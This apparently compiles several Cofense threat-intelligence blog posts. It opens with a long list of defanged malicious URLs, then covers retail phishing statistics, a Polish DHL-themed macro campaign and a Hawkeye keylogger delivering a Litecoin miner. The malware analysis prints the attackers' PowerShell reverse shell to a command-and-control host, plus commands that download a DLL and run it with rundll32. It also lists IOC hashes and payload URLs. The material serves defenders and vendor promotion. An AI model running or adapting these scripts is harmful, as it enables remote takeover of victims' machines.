hXXp://clurit[.]com/matematika/images/content/open-array/additional-portal/open-array/additional-portal/3qZqx-tb7HH2KcNhHi82/

hXXp://collegebolo[.]in/wp-content/OCT/i91smxgw72t/iayid-933690-003423-pxhqzu7z4-e9fxqjnvn/

hXXp://collegiatevideoscout[.]com/piq88y/multifunctional-zone/verifiable-portal/vzwsusvfoq2kbmt-y496uwt7xz68uy/

hXXp://compworldinc[.]com/browse/4ni6zf2fq/

hXXp://contestshub[.]xyz/wp-content/evfch-p40-368725/

hXXp://cosmeticsurgeoninkolkata[.]in/wp-content/multifunctional-zone/security-space/oG7v7CkLAl-jz0rugqbjvi73/

hXXp://cosmicconsultancy[.]in/custom-icons/Reporting/

hXXp://cp[.]3rdeyehosting[.]com/wp-includes/esp/

hXXp://crazyroger[.]com/cgi-bin/1710496674006_01bd6Zeef0mCJ_disk/external_forum/4dwy_zxz36x4/

hXXp://creatitif[.]com/wp-admin/Reporting/

hXXp://croptool[.]com/theblackjackmob/Documentation/

hXXp://crownedbynature[.]com/jtaa6jtb/LLC/

hXXp://csa[.]cries[.]ro/ckjca7/11206-JdwhXBh41Cj8irAC-resource/individual-warehouse/ay7fc9ll3dnke7e-4yw99s2t6w/

hXXp://csrngo[.]in/alfacgiapi/15vu8s-c85u1-9139/

hXXp://daisybucketdesigns[.]com/pocketframes/images/aci32rk/eTrac/5w4kiwqito3r/

hXXp://dalao5188[.]top/wp-content/open-sector/test-forum/f0pqn-5328/

hXXp://dastsaz[.]shop/wordpress/private_array/verifiable_forum/BpajlMaeH_297iwG6jj7pGc/

hXXp://datrienterprise[.]com/wp-content/eTrac/7qzoqzrkjyuc/

hXXp://demo[.]bragma[.]com/site/pt48-pk3089b-682065491-ZkL2pS9yz/open-warehouse/LXWiJKrI-62Hui1o9a/

hXXp://demo[.]podamibenepal[.]com/superior/t2c-jpip6-22/

hXXp://demo[.]tanralili[.]com/apehhpf/INC/

hXXp://designers-platform[.]com/binzbc/FILE/a69zlr8/

hXXp://dev[.]consolidationexpress[.]co[.]uk/wp-admin/closed_sector/924553_1wSxAW2z_portal/2EI6ej9js5j_15M1p7xI9Gov/

hXXp://diamondbreeze[.]com/wp-content/docs/ig220w-64348062-050708-0o2ix-nk0skuh0/

hXXp://diecinuevebn[.]com/cgi-bin/protected-disk/verified-forum/ah7hwmjvvuuy84mx-t467s/

hXXp://diegojmachado[.]com/cgi-bin/open_sector/CLp2Etz_eUR1Q6uDDBgHkI_area/bDuOHXDda_cgI6sNcjl1gK/

hXXp://dishekimieroluzun[.]com/wp-content/DOC/

hXXp://dreammotokolkata[.]com/cqye/iaft92-6lplx-826/

hXXp://drsudhirhebbar[.]com/minds/private-sector/open-portal/rb2vj1kuwjbb-swuys/

hXXp://dubit[.]pl/site2/pxre-ns-297/

hXXp://dumann[.]com[.]br/z3gy5lb/sites/7bg1i8n2/jvsjhn3j-868085891-343651-sgosfko-20u4kmz2cb/

hXXp://elitexpressdiplomats[.]com/cgi-bin/available-array/guarded-5UJi7-pIM1v1g3Q6k6/whf6zxh-txsts2/

hXXp://empowerlearning[.]online/wp-admin/ruh006-rgkj-590/

hXXp://especialistassm[.]com[.]mx/inoxl28kgldf/docs/l5rbj6g/iibea-032709148-341719111-6r6auusna-6j9m/

hXXp://euonymus[.]info/twxppk/Document/7uo0t4osm95p/

hXXp://evokativit[.]com/TEST777/YHErlTl/

hXXp://evolvedself[.]com/dir/azpdj41_sugzd3yhwwsy_3709679_Rvta29FrYib/special_QDPYSSWZ1L_PJAv0ICNK1P/2Edulb_98mGeuzy3ty2Lz/

hXXp://extend[.]stijlgenoten-interactief[.]nl/test/Pages/w6014u-84395-6469-hthslxcbne-8vj2et4/

hXXp://finndonfinance[.]com/wp-content/Document/wjswrn1s/qgltg-85747767-49820504-2gz892-ydp6o4o4e/

hXXp://fooladshahr[.]simamanzar[.]ir/dup-installer/closed_box/interior_portal/0f6j5b5bga_06zs0/

hXXp://fozet[.]in/wp-content/eTrac/hb6yb86ei36/yrqsf32-172576671-4195092231-c97ty6f-5cu2q8hj8/

hXXp://freestyle[.]hk/picture_library/eTrac/s9shv2eo/

hXXp://frezydermusa[.]com/wp-content/parts_service/fisq814goap0/fhyl68-5565-326796-rr55j9spg-ug9mfyg/

hXXp://galeriariera[.]cat/assets/lm/g9zkvryjwq-0524005005-0333576-k58dqx5-326yx/

hXXp://gameonline11[.]com/wordpress/pqOAPS/

hXXp://gargchaat[.]com/phpmailo/lm/538skcfoe/7vps0iy-66657310-44075-q2gbc4-2vhp2c/

hXXp://gayweddingsarasota[.]com/cgi-bin/esp/68f6yd4ehwdr/

hXXp://gayweddingtampabay[.]com/cgi-bin/private-2828581710383-rNH3ETP8sT2ggXrt/additional-forum/DEsne0OE5vz-KmmglLMf/

hXXp://geekmonks[.]com/cgi-bin/common_sector/special_forum/9cfuf_ts9y4twzx0709/

hXXp://germxit[.]mu/calendar/4rxl-2932-78/

hXXp://gestto[.]com[.]br/wp-lindge/Scan/

hXXp://getabat[.]in/wp-content/closed_module/test_88i6oai_sjwnuscqjjl/abgyQKwZhv6i_inKjGl8hG98/

hXXp://globalstudymaterial[.]com/pdf/available-zone/individual-warehouse/vWOq8gdCRu0-ra1nf24iHayat/

hXXp://goldinnaija[.]com/wp-admin/sites/xaz6-030261-0911995608-sm9u-99rd1/

hXXp://gomaui[.]co/wp-includes/personal-resource/test-area/a9kj-wsuyvw59t/

hXXp://grace2hk[.]com/b6vg89hb/common_sector/security_forum/4tx_uu501xxxs/

hXXp://grahaksatria[.]com/towed/private_box/additional_forum/x1T0kdo_q89uLjatbqJ8/

hXXp://greatercanaan[.]org/wp-admin/Document/kqfz63hy/

hXXp://grocery2door[.]com/nkpk/97_dwi59_03276182_sJsjrqR/corporate_warehouse/13wrnaGqqET_lIy0l5eJsNdIc/

hXXp://groovy-server[.]com/masjid/backend/web/assets/rhhl/

hXXp://group8[.]metropolitanculture[.]net/wp-admin/multifunctional-sector/verifiable-cloud/l0q-4vww/

hXXp://haoyun33[.]com/wordpress/browse/9kmt2hi/

hXXp://hasung[.]vn/wp-includes/1bvxk7fvre5_lnci6bcnim_resource/special_forum/5BZ0CZ_p4052N871e/

hXXp://hfn-inc[.]com/mail/available-box/security-PgUqz6ktI-GY00tgjAgbFSr5/zy5escaf56fzw5y-y78s2tzu60v7z4/

hXXp://homecarehvac[.]com/wp-includes/open_resource/guarded_profile/eshftvv0ht_61x297v2/

hXXp://indusautotec[.]com/n8l7suy/open-xNFfQ20VO-FjqtokyzbQ6HGF/security-jdEM-dDzAJO2Ccnx/G3P8qq-MmI2GLf3JdK/

hXXp://jgx[.]xhk[.]mybluehost[.]me/scarcelli/multifunctional_098152347732_CYNEZ9DFQ/guarded_space/2qq1r_29xuz/

hXXp://jurness2shop[.]com/cgi-bin/private_disk/individual_ufyGUNB_QRlHjxmYMMbuaY/30lpuw22llwzm_vx60vx4s/

hXXp://kallinsgate[.]com/cw6vmaj/common-2561851-hLdPAOsBNVrNeE/open-space/5irmsa8-8x82zv7t2zw2x/

hXXp://kanntours[.]com/wp-security/Overview/yprr0k8-808004671-920995225-dc1d7q7-trbbwtd/

hXXp://kayzer[.]yenfikir[.]com/quadra[.]goldeyestheme[.]com/lm/

hXXp://kelurahanraya[.]ulvitravel[.]com/tmp/eTrac/wpag9c-3294986-0565941971-rbtkv0yr0p-rs604o/

hXXp://kpu[.]dinkeskabminsel[.]com/wp-admin/available_229278636_TO7LG1kXBWax3/847166_Zm9B3oXaP_portal/ZcAtrKAnB_nJGzswNc/

hXXp://kyrmedia[.]com/whnh/closed_zone/test_warehouse/o1yvycunyw222_tz6z71svs35/

hXXp://lalletera[.]cat/bootstrap/closed-array/test-warehouse/9y3rm68-7251/

hXXp://lastminuteminicab[.]com/l56mcv/Scan/qrg67fldazss/cd38ot-8952552-5429276851-63g720il-z2uwrr/

hXXp://lindamarstontherapy[.]com/psqlud/common_1810413_gc4qCpSFYbBM/additional_forum/4kmyjjijspz85_tt20x6w/

hXXp://liveleshow[.]com/cgi-bin/open-sEVbZ-kyyyJcjMY/verified-area/n7tk0nygk2up7j-7824vz2y/

hXXp://lsperennial[.]com/tnnfxu/545533028378/ofzt2ll4a-4754801-8569215-64d2t-rbtsi5ylgq/

hXXp://masspaths[.]org/transcyclist/open-array/69537295-LwrlRuR-portal/riy-u5984475/

hXXp://mistyvillage[.]com/inoxl28kgldf/open-sector/individual-forum/TC1AThq8D-H4iKcw9erMc8a7/

hXXp://monoclepetes[.]com/disneyworldclassroom/browse/

hXXp://mosaiclabel[.]com/4f9xnykaf/common-box/corporate-a30njr6-34dhllfehbjex6/14rm3hr6k358-x32zy5/

hXXp://myclarkcounty[.]com/wp-includes/open-resource/open-forum/o6a3exwvzfo-4wwxx8uts7/

hXXp://myfamilyresearch[.]org/dir/paclm/

hXXp://nisanurkayseri[.]com/fhiq04sgna7/a683w-an3x-4946/

hXXp://norikkon[.]com/administrator/16542-fBTLcdbEyJr-sector/VFCLsV-bAwgBBBeBqaJ-forum/fft2z7gdyzqee-8z80w6z68vs/

hXXp://nunes[.]ca/s59nlj/DOC/

hXXp://pascalterjanian[.]com/logs/multifunctional-2519534-Fs87CEgtQY82H6/verifiable-forum/2iFKNGyl-Ksmyn3gyI/

hXXp://plaestudio[.]com/wp-admin/multifunctional-zone/verified-space/zftkjoaw-xzuwtu1228/

hXXp://pmnmusic[.]com/backup-1540795171-wp-includes/Document/

hXXp://productorad10[.]cl/cdn-cgi/lm/6bwolkvw/

hXXp://radigio[.]com/qcloid/Pages/aveebb8ri/

hXXp://rememberingcelia[.]com/cgi-bin/private-box/additional-cloud/WoMAYyGYPic-ejGtLw5zKk9132/

hXXp://richardciccarone[.]com/watixl/Pages/iwq2bcuhtc/fpl5dh7-1085-7485017905-7upoox-mmwh5rr/

hXXp://rkpd[.]ulvitravel[.]com/cgi-bin/s0pgy-yg3-606/

hXXp://rozziebikes[.]com/tshirts/7XOEME6DSPI/l6bpob8m-8104-0278018-y6o222jln-fsxji7gy9l/

hXXp://safiryapi[.]net/mainto/private-zone/9977527-TGAtxV-space/noliIDq-ffuwzjN5H8zj/

hXXp://sakuralabs[.]com/4gubn/personal-zone/interior-forum/rye8idbdwx6uiw9-vtw0y35413/

hXXp://scottproink[.]com/wp-includes/LLC/3nm06yz1og/

hXXp://sigepromo[.]com/fonts/multifunctional-sector/security-kojbhnhsfxht47-4qgj/xznv8-35sz95t0t7/

hXXp://sofiarebecca[.]com/ybfm/multifunctional-XhmwQuIS-uBXA6FSMcoaXT2/7427993-1AJW4cmy-profile/P0jkvy-gwgs3qvm/

hXXp://southeasternamateurchampionships[.]com/0ng1en8p/common-57GaJ-JU2y57Cw9wWp/test-area/1CP3gWMySaac-iixIpxfJ216/

hXXp://southernlights[.]org/wp-includes/attachments/13iqe8n/

hXXp://stlaurentpro[.]com/25bd/Overview/qnrlmvj/

hXXp://stluketupelo[.]net/sermon/Document/

hXXp://technosolarenergy[.]com/wpk0/esp/xcggf7f/l41sd6-372903-111521309-pe7nqblm-rnbcyph7/

hXXp://thebeaversinstitute[.]org/m6zxne/open_sector/verifiable_grIwVfcE_JNkyS1ABG7O/JOr8Y2_c0N5pfizn8tqv/

hXXp://thecityglobal[.]com/creative/DOC/tmi48tldo/8fcpm52kxc-1823-224157721-0k5g3-2ntwz3u/

hXXp://theconsciouslivingguide[.]com/w63gh/NQOOE7ZE6E/

hXXp://theordeal[.]org/2hqr15/71028031_i0jDg_array/verified_profile/M17xNfJi_afcjbJ9y2/

hXXp://tinystudiocollective[.]com/tvtepc/parts_service/c5hlpnbm/04yte-92982998-989677-xuln504d-wj8wr99a0r/

hXXp://trinituscollective[.]com/wp-admin/DOC/3k2yxczqa-017872-15130767-6fcy299dtf-5p8y1zk/

hXXp://turbinetoyz[.]com/inc/available_sector/open_cloud/7gDaxLdZntQO_f54w1mdqt/

hXXp://vektra-grude[.]com/components/sites/xyj3oy2f/

hXXp://wolvesinstitute[.]org/wp-admin/INC/muosryq6917p/uozxo9-82202-738575-fbm4hisdv-0q5dy3ciz/

hXXp://www[.]africanswoo[.]com/wp-includes/IOG/

hXXp://www[.]bonfireholidays[.]in/efqog/Documentation/

hXXp://www[.]demarplus[.]com/19sn7/Overview/

hXXp://www[.]southwayhomes[.]co[.]uk/wp-admin/lm/5x8c1xywx2h/

hXXp://xhd[.]qhv[.]mybluehost[.]me/Maidentiffany/a4wnq/INC/be5oryde748n/877iw8k2-5677720-10188-kjqm-al3ax20hth/

hXXp://xn--3jsp48bswaq48h[.]com/binzbc/protected_disk/WsgEuoVh6_GLg1uIsNZxocly_tdagf_sb0hy87m9gi/jWdMxTd9_a73ophNx/

hXXp://yourdirectory[.]website/Mccracken/eTrac/rpiglgay-1418052884-1524951880-uuys-0fxj/

hXXps://bipinvideolab[.]com/wp-admin/51917864823222027/b0n0hcp4sl83/

hXXps://crossworldltd[.]com/wp-includes/48p5-o3ih-71/

hXXps://flexwebsolution[.]com/assets/multifunctional_disk/external_forum/7aa8z9os32iqygd_3gp4h/

hXXps://gurukool[.]tech/assets/t85vawx7s2xbi3q-1mvazihmr-module/interior-forum/gEwMX8-s0pLx8jJMLhGN/

hXXps://keshavalur[.]com/css/WRssOm/

hXXps://makmursuksesmandiri[.]com/wp-content/e3tpt3cph1wncut-ika4etq8sml6-sector/interior-htMCj-UR5CVYGd/bnb5oaopu0ptx-0wyytzw7u5/

hXXps://misterglobe[.]org/generall/Overview/i9y202-334800485-67760472-jj04w2e19-xppp1/

hXXps://mountainstory[.]pk/qoaij52hfs1d/common_FOQqDSi_Q50ORC3MzecY/guarded_9ode8j8xa3q9fa_3a14tqqj/x1e_418t92/

hXXps://murraysautoworks[.]com/contact/6VE37Q01O/50v2q5af8tv/y27daizl9-678276-439755027-2i7xojwpjd-ryyu/

hXXps://nhakhoachoban[.]vn/wp-includes/paclm/

hXXps://power-charger[.]co[.]uk/faq/Reporting/g30g4b8wvh/0w5c-2857976-135390-1dg1e-bjus2/

hXXps://risefoundations[.]in/rise/8448397_cee81q_jftx3_eseQqSx/corporate_pfmWWf_7uk8kfJTJvUrTR/OvdwZPUQy_ntycKI1ipM2/

hXXps://sharefoundation[.]in/wp-admin/multifunctional_module/test_cloud/oJuKHM3ik_Mee0ttbGc/

hXXps://summit2018[.]techsauce[.]co/startup/sYHAteT/

hXXps://timestampindia[.]com/citech/Document/

hXXps://twincitiesfrugalmom[.]com/wp-admin/eTrac/9porgmi/ul99a0-5568735694-75056-vt6wk395a-yymz6f/

hXXps://www[.]jadegardenmm[.]com/engl/docs/h85me2-45331562-6525577-0c62dwu3hl-mk47l/

hXXps://www[.]u4web[.]com/bnkddo/open_disk/guarded_kzfciuyy_v4gqdp/1dOq8z5_ILk0gJmw/

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

By Tonia Dudley

The advent of the modern-day shopping mall was in the mid-1950’s and it continued to rise in popularity as the go-to place for shopping in the decades thereafter. Watching the hit series Stranger Things is a great reminder of the mall experience, but how times have changed with the introduction and boom of the internet. Retailers shifted their approach to stay relevant in the online era by standing up websites to accompany their brick & mortar locations.

Today we see retail outlets that exist solely in the web sphere – without any type of building. They are prime targets not only for consumer fraud but also cyber-attacks on retail data and reputations. The online marketplace excels in delivering goods quickly to the “I need to have it now” buyer. Threat actors excel too. They are masters at leveraging this urgency, as well as today’s delivery methods, to lure shoppers into scams.

And consumers aren’t the only targets. Attackers go after employees at retail organizations with phishing emails designed to steal customer data and create a PR nightmare. When this happens, consumers naturally think twice about buying again.

83% of consumers are concerned about purchasing from a company that was previously breached.

60% of POS compromises started with a phishing attack.

Source: 2019 Generali Global Assistance Cyber & Digital Protection Survey

What does this all mean when it comes to the phishing threat landscape? Consumers generally require a username and password to place an order on most websites. Based on threat intelligence from our research teams here at Cofense™, we know that threat actors primarily craft emails designed to steal credentials, both from consumers to gain access to online accounts and from retail employees to gain a foothold in an organization and compromise further. This is why it is critical for retail organizations to ensure their support staff have been trained to identify and report phishing attempts to gain access to their credentials.

29% of all breaches involve stolen credentials.

Source: 2019 Verizon Data Breach Investigations Report

Cofense partnered with the Retail ISAC this past summer to conduct a benchmark study. Participants ranged from small to large organizations. It is clear that organizations with an easy reporting method – a button within the mail client – are more resilient to defending against a phishing threat.

Figure 1: Susceptibility and resiliency rates for manual reporting vs. email button-based reporting, average

Figure 2: Susceptibility and resiliency rates for reporting by user group size

Retail organizations are no different than other industries – to effectively defend against phishing attacks, they need visibility of attacks that have bypassed existing controls. It takes more than a Secure Email Gateway and phishing Computer Based Training to enable Security Teams to respond quickly and reduce the risk of compromise or data breach. Cofense is uniquely positioned to help retail organizations unite to fight phishing through our comprehensive phishing defense portfolio.

To learn more about retail phishing attacks and how Cofense can help, view our new infographic.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

PowerShell Scripts Delivered Via Office Macro Attachments Target Polish Employees

By Max Gannon

Cofense IntelligenceTM has uncovered an advanced phishing campaign targeting Polish employees that delivers PowerShell scripts, designed to evade detection by security technologies and give threat actors remote control of the infected computer. The Polish language emails in this campaign impersonate DHL, using misleading content and a spoofed sender email address. The attachment contains a Microsoft (MS) Office macro that checks the language of the installed Office program and only proceeds if it is in Polish language. A PowerShell script is downloaded that, in turn, downloads a set of additional PowerShell scripts, enabling the threat actor to seize control of the computer remotely.

Figure 1: Original Email

The attached .xls file contains a macro that prompts the “Enable Content” message as well as displaying a button to “print” a receipt, likely intended to lend an air of legitimacy and provide a further reason to enable macros.

Figure 2: Attached Spreadsheet Content

This button does not appear to work even if macros are enabled. Once enabled, the macro checks to see if the language of the installed Office product is Polish. If it is not, the file closes and opens a new blank workbook. If the installed Office product language is Polish, a .vbe script is downloaded. This script then runs and repeatedly requests a new payload from the same location (mantoropols[.]xyz) and processes each response as a separate PowerShell script. It also attempts to disguise its traffic by performing multiple HTTP POSTs to google.com. The POST parameters that retrieve the PowerShell scripts appear to have identifying information about the local computer. However all of the variables are pre-set when the script runs, and only the ID value is unique.

Figure 3: POST Data from Office macro

Each session with the Command & Control (C2) server begins with a request for information about the local computer using direct PowerShell commands and a mix of consistently placed garbage string. By retrieving these commands through the C2 channel rather than using a locally saved list of possible commands, threat actors make it harder for defenders to know the full suite of options and capabilities available to the threat actors. By collecting the information via PowerShell queries, the threat actors also make it easier to detect virtual environments, as the information retrieved by PowerShell is harder to spoof than the data typically disguised by reverse engineers.

The requested information is:

  • Processor ID (Serial Number)
  • Full Operating System Version
  • Computer name
  • Username
  • Computer “model” (detects VMWare)
  • Computer “manufacturer” (detects VMWare)
  • System language
  • Processor architecture (x86 or x64)
  • PowerShell version
  • Total Physical memory (detects VMWare)
  • IP address
  • Current working directory
  • Current date
  • Installation date (detects VMWare)
  • Graphics card (detects some virtual environments)

The image in Figure 4 is an example of the repeated exchange. Each line beginning with “try” is sent from the server, and the following indented line is sent from the infected computer.

Figure 4: Data Exfiltration

Next, there are three (or more) separate scripts. Script 1 checks anti-virus and sets persistence via an encoded registry entry and a startup shortcut that often changes based on new commands.

Figure 5: Creation of LNK Used For Persistence And Decoded Content

The URL payload in the registry is called “finalPayload” in the conversations with the C2, providing some insight into the extent of the PowerShell script controlling the threat actor’s involvement in the infection process. In a similar manner, the threat actor names the section of the script that creates the LNK file as “lnkl”. This labeling is seen at the end of each conversation which the server ends by sending a label such as “lnkl” to the host. The host then responds with that same label.

The payload downloaded by the LNK persistence mechanism is yet another script that initiates a persistent connection to the C2 and then waits for commands.

$test = 0;
while ($true)  {
  try {
    $ErrorActionPreference = "SilentlyContinue";
    $GoYsd803308 = New - Object Net.Sockets.TCPClient("chtroppsoj[.]info", 80);
    $LbkfB457364 = ($GoYsd803308.GetStream());
    [byte[]]$dCrY874 = 0..500|% {
      0
    };
    while (($lxQIfq175383 = $LbkfB457364.Read($dCrY874, 0, $dCrY874.Length))  - ne 0)  {
      $zGNk383 = (New - Object Text.ASCIIEncoding).GetString($dCrY874, 0, $lxQIfq175383);
      $kpqm758 = ([text.encoding]::ASCII).GetBytes((iex $zGNk383 2 > &1));
      $LbkfB457364.Write($kpqm758, 0, $kpqm758.Length);
      $LbkfB457364.Flush()
    }
   } catch {
    Start - Sleep  - s 15;
    if ($GoYsd803308.Connected)  {
        $GoYsd803308.Close();
   }
  }
}

 

Once this persistence mechanism has been established, the next stage is most often the download of additional malware such as Ursnif. This next script is labeled by the threat actor as “downdll” and as its name implies, only downloads a .dll without executing anything.

"downdll"; $XwmpW = New-Object System.Net.WebClient; $XwmpW.Headers["User-Agent"] = "";  $XwmpW.DownloadFile("hXXps://arethatour[.]icu/372873/corpo1.dll", "$env:APPDATA\Sg.dll");

The following script is labeled “rundll”. Unsurprisingly, this runs the .dll downloaded by the previous script.

"rundll"; Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList "$env:APPDATA\Sg.dll,DllRegisterServer"

Once this command is executed and the client responds with the appropriate “rundll”, the cycle begins again.

By using deceptively simple commands and minimal code, threat actors can perform data exfiltration and payload downloading while maintaining a relatively small footprint. The small script and reliance on executing code either in memory or using data from a registry entry enables threat actors to leave only the .lnk file used for persistence on infected computers. As a result, the threat actors involved in this infection represent a threat to enterprises that do not block PowerShell execution or do not log executed scripts. What makes this threat even more concerning is that although the current process appears to be automated, it would require relatively little effort on the part of the threat actor to manually engage with infected computers.

Description Indicator
PowerShell Reconnaissance Tool Payload and C2s hXXps://chtroppsoj[.]info:443/debug/download/s/rKD
hXXps://gillslodss[.]info:443/debug/download/s/Gpf
hXXps://chtroppsoj[.]info:443/debug/download/s/DoFH
hXXps://seioodsoi[.]club:443/chkesosod/downs/VhQWr
hXXps://chtroppsoj[.]info:443/debug/download/s/ydFFLg
hXXps://arethatour[.]icu/372873/corpo1.dll
hXXps://chtroppsoj[.]info:443/debug/download/s/QqTlFT
chtroppsoj[.]info
Visual Basic Script Payload hXXps://mantoropols[.]xyz/
Visual Basic Script File printhpp.vbe
712754776baf025993b16846b97a331b
Office Macro Payload hXXps://reloffersstart[.]co/ss[.]php?
Office Macro Files 20889194950.xls
c53b7ebf5e5459727d80b485d1a964e8
24759494620.xls
ef4b91920f1567cc8f6bece2bcd4e010
28301710180.xls
ab515665320573a21155a6abeb2d54a3

Table 1: PowerShell Reconnaissance Tool Payload and Command and Control (C2) Locations

How Cofense Can Help:

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense Center were reported by end users and bypassed technical controls that were in place to protect them.

Cofense PhishMe offers a simulation template, “Return Shipment – Polish,” to educate users on the phishing tactic described in this blog. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 32814.

Quickly turn user reported emails into actionable intelligence with Cofense Triage and reduce exposure time by rapidly quarantining threats with Cofense Vision.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

This Advanced Keylogger Delivers a Cryptocurrency Miner

By Aaron Riley

In a new twist, a phishing campaign is delivering the advanced Hawkeye Keylogger malware to act as a first stage loader for a cryptocurrency miner. Hawkeye Keylogger – Reborn V9 was attached to a job application attachment themed phishing email. Once executed, Hawkeye then downloaded and ran a sample of the open-source software CGMiner. The CGMiner sample was an older version and configured for the cryptocurrency Litecoin. This is the first instance in which Cofense Intelligence™ has analyzed a keylogger being used as merely a first stage loader to deploy a crypto-miner.

The job application attachment theme used in this phishing campaign was generic and did not target a specific business department or job opening. As seen in Figure 1, the email is short and plain; however, the email source code showed a configuration that can be used for alerts. The email’s character set was configured for “Windows-1251,” which is used to support Cyrillic languages. Considering the business use of Cyrillic languages, this configuration can be used for alerting within the email security stack. The email had a .zip archive attachment that delivered a sample of Hawkeye Keylogger – Reborn V9.

Figure 1: Compromised email address delivering malicious ZIP attachment under guise of a CV

Hawkeye Keylogger is subscription-based and has been sold on forums since 2013. It has gone through many version updates and has even changed development ownership in the past. This advanced keylogger can be used to monitor systems, gather sensitive information from the machine, and exfiltrate the information to the Command and Control (C2) structure in multiple ways. The developer’s advertisement does not tout it as a first stage downloader. The threat operator behind this campaign utilized the file installation feature—typically used for setting persistence on the infected machine—to download and execute the sample of CGMiner. After the download and execution of the secondary payload, Hawkeye Keylogger stalled in its processes and did not attempt any further action.

CGMiner is an open-source cryptocurrency miner that can be executed across all operating systems. Older CGMiner versions can be configured to mine multiple different types of cryptocurrency and are designed to work with most AMD graphics cards. This sample of CGMiner is version 3.5, which is an older version that still supports CPU/GPU mining. This miner sample uses the Stratum protocol over TCP port 3333 and is configured to mine Litecoin. Newer versions of CGMiner do not support CPU/GPU mining and only provide algorithms for the Bitcoin cryptocurrency. CGMiner can be easily spotted when analyzed in a sandbox environment. The same is true of the Stratum protocol, which can be used as an alert for network activity.

Cryptocurrency miners have been seen in phishing campaigns before, but rarely are they ever used as a second stage infection from an advanced keylogger. This version of CGMiner was deliberately selected for the CPU/GPU mining feature for Litecoin mining. The infection chain showed places where the email and network security stack should have acted. Setting these alerts, tuning the technology, and educating end users is the best way to avoid these phishing campaigns.

Table 1: Indicators of Compromise

Description Indicator
Hawkeye Keylogger Within Attachment Redacted_RESUME_Sep.exe a381ba89d294f120dd76a684bda24276
Email Attachment Redacted_RESUME_Sep.zip
3866532d537df4795d88f97c38c1c25a
CGMiner functionupdate.exe
4a7d5d67ce8e6a890f4a272be3f782bd
Payload URL hxxp://165[.]22[.]50[.]215/functionupdate[.]exe
Litecoin Mining Connection stratum+tcp://us[.]litecoinpool[.]org:3333

 

 

HOW COFENSE CAN HELP

Cofense PhishMeTM offers simulation templates to educate users on phishing tactics similar to those described in today’s blog.

  • Job Application – Office Macro / Hermes Ransomware
  • Job Inquiry – Cerber (Attachment)
  • Response to Job Posting
  • Resume Attached
  • CV Attached – Petya

Cofense Intelligence TM: ATR ID 32403

Cofense Triage TM: PM_Intel_GCMiner_32403

Every day, the Cofense Phishing Defense CenterTM analyzes phishing emails with malware payloads that bypassed email gateways. 100% of the threats found by the Cofense PDC were identified by the end user. 0% were stopped by technology.

Condition users to be resilient to evolving phishing attacks with Cofense PhishMe TM and remove the blind spot with Cofense Reporter TM.

Quickly turn user reported emails into actionable intelligence with Cofense Triage TM. Reduce exposure time by rapidly quarantining threats with Cofense Vision TM.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence TM.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.